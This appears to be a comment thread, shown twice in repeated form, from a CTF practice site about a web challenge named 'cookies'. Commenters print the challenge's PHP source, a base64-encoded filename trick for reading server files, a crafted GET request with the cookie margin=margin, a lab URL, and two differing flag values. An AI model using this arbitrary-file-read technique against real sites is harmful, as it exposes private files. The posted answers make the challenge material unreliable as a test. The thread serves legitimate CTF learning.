if (isset($_COOKIE['margin']) && $_COOKIE['margin'] == 'margin') { $file_list[2] = 'keys.php'; }
用hackbar,burpsuite都没有得到flag。最后写了个脚本就有了,好奇怪
可能是因为flag在第1行,而第1行,这个行数的数组下标为0,而不是1。源码是 echo $fa[$line];
@1nuyasha 用完hackbar看下网页源代码
还真是,py上脚本出来了。。。 bp和hackbar返回都是空
flag{84c4486721a624b58151691af7778aba}
凡是启动金币大于奖励金币的一律不做
<?php error_reporting(0); $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); $line=isset($_GET['line'])?intval($_GET['line']):0; if($file=='') header("locat
链接推测出filename值为base64加密,改为index.php,将line从0开始,得出源代码审计得出解法,cookie设置margin=margin,line为0,请求后查看响应中包含flag
hackbar: url:http://114.67.175.224:12042/index.php?line=&filename=a2V5cy5waHA= cookie添加 margin=margin 执行后的空白页面,查看源码<!--?php $key="flag{6fd889776a1cbefdd76d72fe89195af5}"; ?-->
hackbar不管用啊,执行之后一片空白,源代码里也什么都没有
注意行号必须是空,如果?line=1时,即使hackbar提交了cookie,第二行没有内容也返回空白
GET /index.php?line=&filename=a2V5cy5waHA= HTTP/1.1 Cookie:margin:margin
题目是cookies,猜测是要设置cookie值。发现/index.php?line=filename=a2V5cy5waHA,显示了keys.txt内容,line应该是显示的行,尝试改成1或2后没有内容。将filename换成index.php的加密值,查看第十行看到if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='marg
...
评论
C0PYCat 1年前
举报
if (isset($_COOKIE['margin']) && $_COOKIE['margin'] == 'margin') { $file_list[2] = 'keys.php'; }
w登临意 1年前
举报
用hackbar,burpsuite都没有得到flag。最后写了个脚本就有了,好奇怪
YSN97 6月前
举报
可能是因为flag在第1行,而第1行,这个行数的数组下标为0,而不是1。源码是 echo $fa[$line];
行走的五花肉 12月前
举报
@1nuyasha 用完hackbar看下网页源代码
1nuyasha 1年前
举报
还真是,py上脚本出来了。。。 bp和hackbar返回都是空
凶残炒土豆 1年前
举报
flag{84c4486721a624b58151691af7778aba}
moke1 1年前
举报
凡是启动金币大于奖励金币的一律不做
嵌入式学的CTF 1年前
举报
<?php error_reporting(0); $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); $line=isset($_GET['line'])?intval($_GET['line']):0; if($file=='') header("locat
joyoung 1年前
举报
链接推测出filename值为base64加密,改为index.php,将line从0开始,得出源代码审计得出解法,cookie设置margin=margin,line为0,请求后查看响应中包含flag
zmcck 1年前
举报
hackbar: url:http://114.67.175.224:12042/index.php?line=&filename=a2V5cy5waHA= cookie添加 margin=margin 执行后的空白页面,查看源码<!--?php $key="flag{6fd889776a1cbefdd76d72fe89195af5}"; ?-->
Traherne 1年前
举报
hackbar不管用啊,执行之后一片空白,源代码里也什么都没有
Restwlaq 1年前
举报
注意行号必须是空,如果?line=1时,即使hackbar提交了cookie,第二行没有内容也返回空白
zdfy005 1年前
举报
GET /index.php?line=&filename=a2V5cy5waHA= HTTP/1.1 Cookie:margin:margin
zdfy005 1年前
举报
题目是cookies,猜测是要设置cookie值。发现/index.php?line=filename=a2V5cy5waHA,显示了keys.txt内容,line应该是显示的行,尝试改成1或2后没有内容。将filename换成index.php的加密值,查看第十行看到if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='marg